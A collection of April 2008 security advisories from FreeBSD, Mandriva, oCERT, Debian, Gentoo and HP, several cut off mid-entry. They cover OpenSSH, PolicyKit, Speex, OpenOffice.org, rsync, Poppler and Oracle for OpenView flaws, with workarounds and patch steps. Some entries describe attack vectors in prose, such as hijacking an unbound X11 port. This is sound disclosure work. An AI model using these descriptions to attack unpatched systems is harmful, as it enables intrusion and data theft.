FreeBSD Security Advisory FreeBSD-SA-08:05.openssh
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 = FreeBSD-SA-08:05.opensshSecurity Advisory The FreeBSD Project Topic: OpenSSH X11-forwarding privilege escalation Category: contrib Module: openssh Announced: 2008-04-17 Credits:Timo Juhani Lindfors Affects:All supported versions of FreeBSD Corrected: 2008-04-16 23:58:33 UTC (RELENG_7, 7.0-STABLE) 2008-04-16 23:58:52 UTC (RELENG_7_0, 7.1-RELEASE-p1) 2008-04-16 23:59:35 UTC (RELENG_6, 6.3-STABLE) 2008-04-16 23:59:48 UTC (RELENG_6_3, 6.3-RELEASE-p2) 2008-04-17 00:00:04 UTC (RELENG_6_2, 6.2-RELEASE-p12) 2008-04-17 00:00:28 UTC (RELENG_6_1, 6.1-RELEASE-p24) 2008-04-17 00:00:41 UTC (RELENG_5, 5.5-STABLE) 2008-04-17 00:00:54 UTC (RELENG_5_5, 5.5-RELEASE-p20) CVE Name: CVE-2008-1483 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit URL:http://security.FreeBSD.org/. I. Background OpenSSH is an implementation of the SSH protocol suite, providing an encrypted and authenticated transport for a variety of services, including remote shell access. The OpenSSH server daemon (sshd) provides support for the X11 protocol by binding to a port on the server and forwarding any connections which are made to that port. II. Problem Description When logging in via SSH with X11-forwarding enabled, sshd(8) fails to correctly handle the case where it fails to bind to an IPv4 port but successfully binds to an IPv6 port. In this case, applications which use X11 will connect to the IPv4 port, even though it had not been bound by sshd(8) and is therefore not being securely forwarded. III. Impact A malicious user could listen for X11 connections on a unused IPv4 port, e.g tcp port 6010. When an unaware user logs in and sets up X11 fowarding the malicious user can capture all X11 data send over the port, potentially disclosing sensitive information or allowing the execution of commands with the privileges of the user using the X11 forwarding. NOTE WELL: FreeBSD ships with IPv6 enabled by default in the GENERIC and SMP kernels, so users are vulnerable even they have not explicitly enabled IPv6 networking. IV. Workaround Disable support for IPv6 in the sshd(8) daemon by setting the option AddressFamily inet in /etc/ssh/sshd_config. Disable support for X11 forwarding in the sshd(8) daemon by setting the option X11Forwarding no in /etc/ssh/sshd_config. V. Solution Perform one of the following: 1) Upgrade your vulnerable system to 5-STABLE, 6-STABLE, or 7-STABLE, or to the RELENG_7_0, RELENG_6_3, RELENG_6_2, RELENG_6_1, RELENG_5_5 security branch dated after the correction date. 2) To patch your present system: The following patch has been verified to apply to FreeBSD 5.5, 6.1, 6.2, 6.3, and 7.0 systems. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch http://security.FreeBSD.org/patches/SA-08:05/openssh.patch # fetch http://security.FreeBSD.org/patches/SA-08:05/openssh.patch.asc b) Execute the following commands as root: # cd /usr/src # patch /path/to/patch # cd /usr/src/secure/lib/libssh # make obj make depend make make install # cd /usr/src/secure/usr.sbin/sshd # make obj make depend make make install # /etc/rc.d/sshd restart VI. Correction details The following list contains the revision numbers of each file that was corrected in FreeBSD. Branch Revision Path - - RELENG_5 src/crypto/openssh/channels.c 1.18.2.1 RELENG_5_5 src/UPDATING1.342.2.35.2.21 src/sys/conf/newvers.sh 1.62.2.21.2.22 src/crypto/openssh/channels.c 1.18.8.1 RELENG_6 src/crypto/openssh/channels.c 1.20.2.3 RELENG_6_3 src/UPDATING 1.416.2.37.2.6 src/sys/conf/newvers.sh 1.69.2.15.2.5 src/crypto/openssh/channels.c 1.20.2.2.4.1 RELENG_6_2 src/UPDATING1.416.2.29.2.16 src/sys/conf/newvers.sh 1.69.2.13.2.15 src/crypto/openssh/channels.c 1.20.2.2.2.1 RELENG_6_1 src/UPDATING1.416.2.22.2.27 src/sys/conf/newvers.sh 1.69.2.11.2.26 src/crypto/openssh/channels.c
[ MDVSA-2008:087 ] - Updated policykit package fixes format string vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2008:087 http://www.mandriva.com/security/ ___ Package : policykit Date: April 16, 2008 Affected: 2008.1 ___ Problem Description: A format string vulnerability in the grant helper, in PolicyKit 0.7 and earlier, allows attackers to cause a denial of service (crash) and possibly execute arbitrary code via format strings in a password. The updated package has been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1658 ___ Updated Packages: Mandriva Linux 2008.1: aa8e182bb5e5d8fe952cfab4c62bf055 2008.1/i586/libpolkit2-0.7-5.1mdv2008.1.i586.rpm 2c2de3341fd2e7b0181215c49b373953 2008.1/i586/libpolkit-devel-0.7-5.1mdv2008.1.i586.rpm 54bc0d67f70ada707da9ac5d35ac6f8a 2008.1/i586/policykit-0.7-5.1mdv2008.1.i586.rpm 864e3c1f5c99ad74a284fe3f35964515 2008.1/i586/policykit-docs-0.7-5.1mdv2008.1.i586.rpm e19c68b55d06d4ad8a00a9c82e38e3fa 2008.1/SRPMS/policykit-0.7-5.1mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: 79e9c91841bf90f09fd7184050164bfe 2008.1/x86_64/lib64polkit2-0.7-5.1mdv2008.1.x86_64.rpm 3bb998cc6595c0f70c47cb22f411962b 2008.1/x86_64/lib64polkit-devel-0.7-5.1mdv2008.1.x86_64.rpm 16ede4d785e987f5e65361570d80bcdc 2008.1/x86_64/policykit-0.7-5.1mdv2008.1.x86_64.rpm c114e50ab7f564a281ddd1096dbde53c 2008.1/x86_64/policykit-docs-0.7-5.1mdv2008.1.x86_64.rpm e19c68b55d06d4ad8a00a9c82e38e3fa 2008.1/SRPMS/policykit-0.7-5.1mdv2008.1.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFIBndVmqjQ0CJFipgRAtAPAKCGzbow3RcmLOWx7pcsGpW5Y+O6AQCglR6a RylBQh4kJd6y3YT4HJRk3FY= =sdlj -END PGP SIGNATURE-
[oCERT-2008-004] multiple speex implementations insufficient boundary checks
2008/04/17 #2008-004 multiple speex implementations insufficient boundary checks Description: The reference speex decoder from the Speex library performs insufficient boundary checks on a header structure read from user input, this has been reported in oCERT-2008-002 advisory. Further investigation showed that several packages include similar code and are therefore vulnerable. In order to prevent the usage of incorrect header processing reference code, the speex_packet_to_header() function has been modified to bound the returned mode values in Speex = 1.2beta3.2. This change automatically fixes applications that use the Speex library dynamically. Affected version: gstreamer-plugins-good = 0.10.8 SDL_sound = 1.0.1 Speex = 1.1.12 (speexdec) Sweep = 0.9.2 vorbis-tools = 1.2.0 VLC Media Player = 0.8.6f xine-lib = 1.1.11.1 XMMS speex plugin Fixed version: gstreamer-plugins-good, = 0.10.8 (patched in CVS) SDL_sound, patched in CVS Speex = 1.2beta3.2 (patched in CVS) Sweep = 0.9.3 vorbis-tools, patched in CVS VLC Media Player, N/A xine-lib = 1.1.12 XMMS speex plugin, N/A Credit: see oCERT-2008-002, additionally we would like to thank Tomas Hoger from the Red Hat Security Response Team for his help in investigating the issue. CVE: CVE-2008-1686 Timeline: 2008-04-10: investigation of oCERT-2008-002 leads to discovery of more affected packages 2008-04-10: Speex header processing code fixed in CVS 2008-04-11: contacted upstream maintainers and affected vendors 2008-04-11: gstreamer-plugins-good patched in CVS 2008-04-11: sweep 0.9.3 released 2008-04-11: SDL_sound patched in CVS 2008-04-14: vorbis-tools patched in CVS 2008-04-14: xine-lib 1.1.12 released 2008-04-17: advisory release References: http://www.ocert.org/advisories/ocert-2008-2.html http://trac.xiph.org/changeset/14701 http://webcvs.freedesktop.org/gstreamer/gst-plugins-good/ext/speex/gstspeexdec.c?r1=1.40r2=1.41 http://trac.metadecks.org/changeset/554 http://svn.icculus.org/SDL_sound?view=revrevision=537 http://svn.icculus.org/SDL_sound?view=revrevision=538 http://trac.xiph.org/changeset/14728 http://hg.debian.org/hg/xine-lib/xine-lib?cmd=changeset;node=66e1654718fb;style=gitweb Links: http://gstreamer.freedesktop.org/modules/gst-plugins-good.html http://icculus.org/SDL_sound http://www.speex.org http://www.metadecks.org/software/sweep/ http://xiph.org http://www.videolan.org/vlc http://xinehq.de Permalink: http://www.ocert.org/advisories/ocert-2008-004.html -- Andrea Barisani |Founder Project Coordinator oCERT | Open Source Computer Emergency Response Team [EMAIL PROTECTED] http://www.ocert.org 0x864C9B9E 0A76 074A 02CD E989 CE7F AC3F DA47 578E 864C 9B9E Pluralitas non est ponenda sine necessitate
[SECURITY] [DSA 1547-1] New OpenOffice.org packages fix arbitrary code execution
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1547-1[EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze April 17th, 2008http://www.debian.org/security/faq - -- Package: openoffice.org Vulnerability : several Problem type : local (remote) Debian-specific: no CVE IDs: CVE-2007-5745 CVE-2007-5746 CVE-2007-5747 CVE-2008-0320 Several security related problems have been discovered in OpenOffice.org, the free office suite. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2007-5745, CVE-2007-5747 Several bugs have been discovered in the way OpenOffice.org parses Quattro Pro files that may lead to a overflow in the heap potentially leading to the execution of arbitrary code. CVE-2007-5746 Specially crafted EMF files can trigger a buffer overflow in the heap that may lead to the execution of arbitrary code. CVE-2008-0320 A bug has been discovered in the processing of OLE files that can cause a buffer overflow in the heap potentially leading to the execution of arbitrary code. Recently reported problems in the ICU library are fixed in separate libicu packages with DSA 1511 against which OpenOffice.org is linked. For the old stable distribution (sarge) these problems have been fixed in version 1.1.3-9sarge9. For the stable distribution (etch) these problems have been fixed in version 2.0.4.dfsg.2-7etch5. For the testing (lenny) and unstable (sid) distributions these problems have been fixed in version 2.4.0~ooh680m5-1. We recommend that you upgrade your openoffice.org packages. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given at the end of this advisory: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org_1.1.3-9sarge9.dsc Size/MD5 checksum: 2878 8b2bf5fad94194078687afd08a774051 http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org_1.1.3-9sarge9.diff.gz Size/MD5 checksum: 4663713 95fc9e73f779d582edd4df28c5bdc265 http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org_1.1.3.orig.tar.gz Size/MD5 checksum: 166568714 5250574bad9906b38ce032d04b765772 Architecture independent components: http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-af_1.1.3-9sarge9_all.deb Size/MD5 checksum: 2648250 4c65359ce6ee948e155c3200435e3882 http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-ar_1.1.3-9sarge9_all.deb Size/MD5 checksum: 2700940 f0f7cd9f4e836f69cb01d9b414a7dd8f http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-ca_1.1.3-9sarge9_all.deb Size/MD5 checksum: 2697858 8f73d02ce7e1801f9c50e7625324b780 http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-cs_1.1.3-9sarge9_all.deb Size/MD5 checksum: 3607590 f50b4014d8141f064b281b0cb8d9c115 http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-cy_1.1.3-9sarge9_all.deb Size/MD5 checksum: 2664720 61b0feccf81710f128111fe1caab6773 http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-da_1.1.3-9sarge9_all.deb Size/MD5 checksum: 3604230 bb6543e7dfd37b8b6751eb199450cae2 http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-de_1.1.3-9sarge9_all.deb Size/MD5 checksum: 3491518 cd0c55f2d047f03e1ca1b4167fea7f0e http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-el_1.1.3-9sarge9_all.deb Size/MD5 checksum: 2746570 6cd2c910bd469e26d7fcb37dff4512f5 http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-en_1.1.3-9sarge9_all.deb Size/MD5 checksum: 3558088 9b1510871540ac5dcc350ea0ad4b3a6b http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-es_1.1.3-9sarge9_all.deb Size/MD5 checksum: 3598796 d0ea026676b3084deb1fc3a77c687e53 http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-et_1.1.3-9sarge9_all.deb Size/MD5 checksum: 2650338 c3db9bce36a17a0776381942063e4ea4
[ GLSA 200804-16 ] rsync: Execution of arbitrary code
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200804-16 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: rsync: Execution of arbitrary code Date: April 17, 2008 Bugs: #216887 ID: 200804-16 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis A buffer overflow in rsync might lead to the remote execution of arbitrary code when extended attributes are being used. Background == rsync is a file transfer program to keep remote directories synchronized. Affected packages = --- Package / Vulnerable / Unaffected --- 1 net-misc/rsync 2.6.9-r6 = 2.6.9-r6 Description === Sebastian Krahmer of SUSE reported an integer overflow in the expand_item_list() function in the file util.c which might lead to a heap-based buffer overflow when extended attribute (xattr) support is enabled. Impact == A remote attacker could send a file containing specially crafted extended attributes to an rsync deamon, or entice a user to sync from an rsync server containing specially crafted files, possibly leading to the execution of arbitrary code. Please note that extended attributes are only enabled when USE=acl is enabled, which is the default setting. Workaround == Disable extended attributes in the rsync daemon by setting refuse options = xattrs in the file /etc/rsyncd.conf (or append xattrs to an existing refuse statement). When synchronizing to a server, do not provide the -X parameter to rsync. You can also disable the acl USE flag for rsync and recompile the package. Resolution == All rsync users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =net-misc/rsync-2.6.9-r6 References == [ 1 ] CVE-2008-1720 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1720 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200804-16.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: This is a digitally signed message part.
[ GLSA 200804-17 ] Speex: User-assisted execution of arbitrary code
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200804-17 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Speex: User-assisted execution of arbitrary code Date: April 17, 2008 Bugs: #217715 ID: 200804-17 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Improper input validation in Speex might lead to array indexing vulnerabilities in multiple player applications. Background == Speex is an audio compression format designed for speech that is free of patent restrictions. Affected packages = --- Package /Vulnerable/ Unaffected --- 1 media-libs/speex 1.2_beta3_p2 = 1.2_beta3_p2 Description === oCERT reported that the Speex library does not properly validate the mode value it derives from Speex streams, allowing for array indexing vulnerabilities inside multiple player applications. Within Gentoo, xine-lib, VLC, gst-plugins-speex from the GStreamer Good Plug-ins, vorbis-tools, libfishsound, Sweep, SDL_sound, and speexdec were found to be vulnerable. Impact == A remote attacker could entice a user to open a specially crafted Speex file or network stream with an application listed above. This might lead to the execution of arbitrary code with privileges of the user playing the file. Workaround == There is no known workaround at this time. Resolution == All Speex users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =media-libs/speex-1.2_beta3_p2 References == [ 1 ] CVE-2008-1686 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1686 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200804-17.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: This is a digitally signed message part.
[ GLSA 200804-18 ] Poppler: User-assisted execution of arbitrary code
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security AdvisoryGLSA 200804-18:02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Poppler: User-assisted execution of arbitrary code Date: April 17, 2008 Updated: April 17, 2008 Bugs: #216850 ID: 200804-18:02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Poppler does not handle fonts inside PDF files safely, allowing for execution of arbitrary code. Background == Poppler is a cross-platform PDF rendering library originally based on Xpdf. Affected packages = --- Package / Vulnerable / Unaffected --- 1 app-text/poppler0.6.3 = 0.6.3 Description === Kees Cook from the Ubuntu Security Team reported that the CairoFont::create() function in the file CairoFontEngine.cc does not verify the type of an embedded font object inside a PDF file before dereferencing a function pointer from it. Impact == A remote attacker could entice a user to open a specially crafted PDF file with a Poppler-based PDF viewer such as Gentoo's Xpdf, Epdfview, or Evince, potentially resulting in the execution of arbitrary code with the privileges of the user running the application. Workaround == There is no known workaround at this time. Resolution == All Poppler users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =app-text/poppler-0.6.3 References == [ 1 ] CVE-2008-1693 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1693 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200804-18.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: This is a digitally signed message part.
[security bulletin] HPSBMA02133 SSRT061201 rev.8 - HP Oracle for OpenView (OfO) Critical Patch Update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c00727143 Version: 8 HPSBMA02133 SSRT061201 rev.8 - HP Oracle for OpenView (OfO) Critical Patch Update NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2006-07-19 Last Updated: 2008-04-16 Potential Security Impact: Local or remote compromise of confidentiality, availability, integrity. Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Oracle® has issued a Critical Patch Update which contains solutions for a number of potential security vulnerabilities. These vulnerabilities may be exploited locally or remotely to compromise the confidentiality, availability or integrity of Oracle for OpenView (OfO). References: Oracle Critical Patch Update - April 2008 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. Oracle for OpenView (OfO) v8.1.7, v9.1.01, v9.2, v9.2.0, v10g, v10gR2 running on HP-UX, Tru64 UNIX, Linux, Solaris, and Windows. BACKGROUND Oracle is a registered U.S. trademark of the Oracle Corporation, Redwood City, California. Oracle has issued Critical Patch Update - April 2008. For more information: http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2008.html Information about previous Oracle Critical Patch Updates can be found here: http://www.oracle.com/technology/deploy/security/alerts.htm The following products are affected: ORA200BC OfO v8.1.7 for HP-UX LTU ORA205BC OfO v8.1.7 for HP-UX 5 LTU Bundle ORA230BC OfO v8.1.7 for HP-UX Media ORA240BC OfO v8.1.7 for HP-UX Eval LTU Media ORA300BC OfO v8.1.7 for Win 2000/NT LTU ORA305BC OfO v8.1.7 for Win 2000/NT 5 LTU Bundle ORA330BC OfO v8.1.7 for Win 2000/NT Media ORA340BC OfO v8.1.7 for Win 2000/NT Eval LTU ORA400BC OfO v8.1.7 for Sun Solaris LTU ORA405BC OfO v8.1.7 for Sun Solaris 5 LTU Bundle ORA430BC OfO v8.1.7 for Sun Solaris Media ORA440BC OfO v8.1.7 for Sun Solaris Eval LTU ORA600CA OfO for Linux LTU ORA605CA OfO for Linux LTU Service Bureaus Bundle ORA631EE Oracle EE v9.2 HP-UX - 1 CPU LTU ORA631SE Oracle SE 9v.2 HP-UX - 1 CPU LTU ORA230CA OfO v9.2 64bit HP-UX .11 Media Kit ORA643EE Oracle EE v9.2 Windows - 1 CPU LTU ORA643SE Oracle SE v9.2 Windows - 1 CPU LTU ORA330CA OfO v9.2 32bit Windows Media Kit ORA637EE Oracle EE v9.2 Solaris 64 - 1 CPU LTU ORA634SE Oracle SE v9.2 Solaris 32 - 1 CPU LTU ORA637SE Oracle SE v9.2 Solaris 64 - 1 CPU LTU ORA430CA OfO v9.2 32bit Sun Solaris 2.72.8 Media ORA431CA OfO v9.2 64bit Sun Solaris 2.72.8 Media ORA646EE Oracle EE v9.2 Tru64 - 1 CPU LTU ORA646SE Oracle SE v9.2 Tru64 - 1 CPU LTU ORA530CA OfO v9.1.01 64bit Tru64 V5.1a Media Kit ORA640EE Oracle EE v9.2 Linux - 1 CPU LTU ORA640SE Oracle SE v9.2 Linux - 1 CPU LTU ORA630CA OfO v9.2.0 for Linux Media Kit T2607AA Oracle for OpenView Partition Opt LTU T3847EE Oracle v10g EE HP-UX , 1 CPU LTU T3847SE Oracle v10g SE HP-UX , 1 CPU LTU T3848AA Oracle v10g EE/SE HP-UX PA-RISC 64, Media T3847AA Oracle v10g EE/SE HP-UX Itanium, Media T3843EE Oracle v10g EE Windows 32, 1 CPU LTU T3843SE Oracle v10g SE Windows 32, 1 CPU LTU T3843AA Oracle v10g EE/SE Windows 32, Media T3844EE Oracle v10g EE Solaris 64, 1 CPU LTU T3844SE Oracle v10g SE Solaris 64, 1 CPU LTU T3844SE Oracle v10g SE Solaris 64, 1 CPU LTU T3844AA Oracle v10g EE/SE Solaris 64, Media T3844AA Oracle v10g EE/SE Solaris 64, Media T3849EE Oracle v10g EE Tru64, 1 CPU LTU T3849SE Oracle v10g SE Tru64, 1 CPU LTU T3849AA Oracle v10g EE/SE Tru64, Media T3845EE Oracle v10g EE Linux, 1 CPU LTU T3845SE Oracle v10g SE Linux, 1 CPU LTU T3846AA Oracle v10g EE/SE Linux x86-32, Media T3845AA Oracle v10g EE/SE Linux x86-64, Media T4855EE Oracle v10gR2 EE HP-UX , 1 CPU LTU T4855AA Oracle v10gR2 EE/SE HP-UX PA-RISC 64, Media T4856AA Oracle v10gR2 EE/SE HP-UX Itanium, Media T4857EE Oracle v10gR2 EE Windows 32, 1 CPU LTU T4857SE Oracle v10gR2 SE Windows 32, 1 CPU LTU T4857AA Oracle v10gR2 EE/SE Windows 32, Media T4858EE Oracle v10gR2 EE Solaris 64, 1 CPU LTU T4858SE Oracle v10gR2 SE Solaris 64, 1 CPU LTU T4858SE Oracle v10gR2 SE Solaris 64, 1 CPU LTU T4858AA Oracle v10gR2 EE/SE Solaris 64, Media T4858AA Oracle v10gR2 EE/SE Solaris 64, Media T4860EE Oracle v10gR2 EE Linux, 1 CPU LTU T4860SE Oracle v10gR2 SE Linux, 1 CPU LTU T4860AA Oracle v10gR2 EE/SE Linux x86-32, Media ORA200CA OfO v9.2 64bit HP-UX .11 LTU ORA205CA OfO v9.2 64bit HP-UX .11 5 LTUs ORA230CA OfO v9.2 64bit HP-UX .11 Media Kit ORA300CA OfO v9.2 32bit Windows LTU ORA305CA OfO v9.2 32bit Windows 5 LTUs ORA330CA OfO v9.2 32bit Windows Media Kit ORA400CA OfO v9.2 32bit Sun Solaris 2.72.8 LTU ORA401CA OfO v9.2 64bit Sun Solaris 2.72.8 LTU ORA405CA OfO v9.2 32bit Sun Solaris 2.72.8 5 LTU ORA406CA OfO v9.2 64bit Sun Solaris 2.72.8 5 LTU ORA430CA OfO v9.2 32bit Sun Solaris 2.72.8 Media ORA431CA OfO v9.2 64bit Sun
[security bulletin] HPSBST02329 SSRT080048 rev.1 - Storage Management Appliance (SMA), Microsoft Patch Applicability MS08-018 to MS08-025
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c01433452 Version: 1 HPSBST02329 SSRT080048 rev.1 - Storage Management Appliance (SMA), Microsoft Patch Applicability MS08-018 to MS08-025 NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2008-04-15 Last Updated: 2008-04-15 Potential Security Impact: Please check the table below Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Various potential security vulnerabilities have been identified in Microsoft software that is running on the Storage Management Appliance (SMA). Some of these vulnerabilities may be pertinent to the SMA, please check the table in the Resolution section of this Security Bulletin. References: MS08-018, MS08-019, MS08-020, MS08-021, MS08-022, MS08-023, MS08-024, MS08-025. SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. Storage Management Appliance v2.1 Software running on: Storage Management Appliance I Storage Management Appliance II Storage Management Appliance III BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score -- Not Applicable -- === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002. Patches released by Microsoft after MS06-051 are covered by monthly Security Bulletins. For the full archived list of Microsoft security updates applicable for Storage Management Appliance software v2.1, please refer to the following Security Bulletins available on the IT Resource Center (ITRC) Web site: http://www.itrc.hp.com/service/cki/secBullArchive.do For patches released by Microsoft in 2003, MS03-001 to MS03-051 refer to Security Bulletin HPSBST02146 For patches released by Microsoft in 2004, MS04-001 to MS04-045 refer to Security Bulletin HPSBST02147 For patches released by Microsoft in 2005, MS05-001 to MS05-055 refer to Security Bulletin HPSBST02148 For patches released by Microsoft in 2006, MS06-001 to MS06-051 refer to Security Bulletin HPSBST02140 The Microsoft patch index archive and further details about all Microsoft patches can be found on the following Web site: http://www.microsoft.com/technet/security/bulletin/summary.mspx NOTE: The SMA must have all pertinent SMA Service Packs applied Windows 2000 Update Rollup 1 Customers are advised to download and install the Windows 2000 Update Rollup 1 for Service Pack 4 on SMA v2.1. For more information please refer to the Windows 2000 Update Rollup 1 for Service Pack 4 and Storage Management Appliance v2.1 advisory at the following website: http://h2.www2.hp.com/bizsupport/TechSupport/DocumentIndex.jsp?contentType=SupportManuallang=encc=usdocIndexId=179111taskId=101prodTypeId=12169prodSeriesId=315667 Windows 2000 Update Rollup 1 for SP4 does not include security updates released after April 30, 2005 starting from MS05-026. It also does not include patches MS04-003 and MS04-028. Please install these patches in addition to Windows 2000 Update Rollup 1 for SP4, if they have not been installed already RESOLUTION HP strongly recommends the immediate installation of all security patches that apply to third party software which is integrated with SMA software products supplied by HP, and that patches are applied in accordance with an appropriate patch management policy. NOTE: Patch installation instructions are shown at the end of this table. - MS Patch - MS08-018 Vulnerability in Microsoft Project Could Allow Remote Code Execution (950183) Analysis - SMA does not have this component. Patch will not run successfully. Action - Customers should not be concerned with this issue - MS Patch - MS08-019 Vulnerabilities in Microsoft Visio Could Allow Remote Code Execution (949032) Analysis - SMA does not have this component. Patch will not run successfully. Action - Customers should not be concerned with this issue - MS Patch - MS08-020 Vulnerability in DNS Client Could Allow Spoofing (945553) Analysis - Possible security issue exists. Patch will run successfully. Action - For SMA v2.1, customers should download patch from Microsoft and install. - MS Patch - MS08-021 Vulnerabilities in GDI Could Allow Remote Code Execution (948590) Analysis - Possible security issue exists. Patch will run successfully. Action - For SMA v2.1, customers should download patch from Microsoft and install. - MS Patch - MS08-022 Vulnerability in VBScript and JScript Scripting Engines Could Allow Remote Code Execution (944338)
[security bulletin] HPSBMA02328 SSRT071293 rev.2 - HP OpenView Network Node Manager (OV NNM) Running Apache, Remote Cross Site Scripting (XSS), Denial of Service (DoS), Execute Arbitrary Code
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c01428449 Version: 2 HPSBMA02328 SSRT071293 rev.2 - HP OpenView Network Node Manager (OV NNM) Running Apache, Remote Cross Site Scripting (XSS), Denial of Service (DoS), Execute Arbitrary Code NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2008-04-15 Last Updated: 2008-04-17 Potential Security Impact: Remote cross site scripting (XSS), Denial of Service (DoS), execute arbitrary code Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Potential vulnerabilities have been identified with HP OpenView Network Node Manager (OV NNM) running Apache. These vulnerabilities could be exploited remotely resulting in cross site scripting (XSS), Denial of Service (DoS), or execution of arbitrary code. References: CVE-2005-3352, CVE-2005-3357, CVE-2006-3747 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP OpenView Network Node Manager (OV NNM) v6.41, v7.01, v7.51 running Apache on HP-UX, Solaris, and 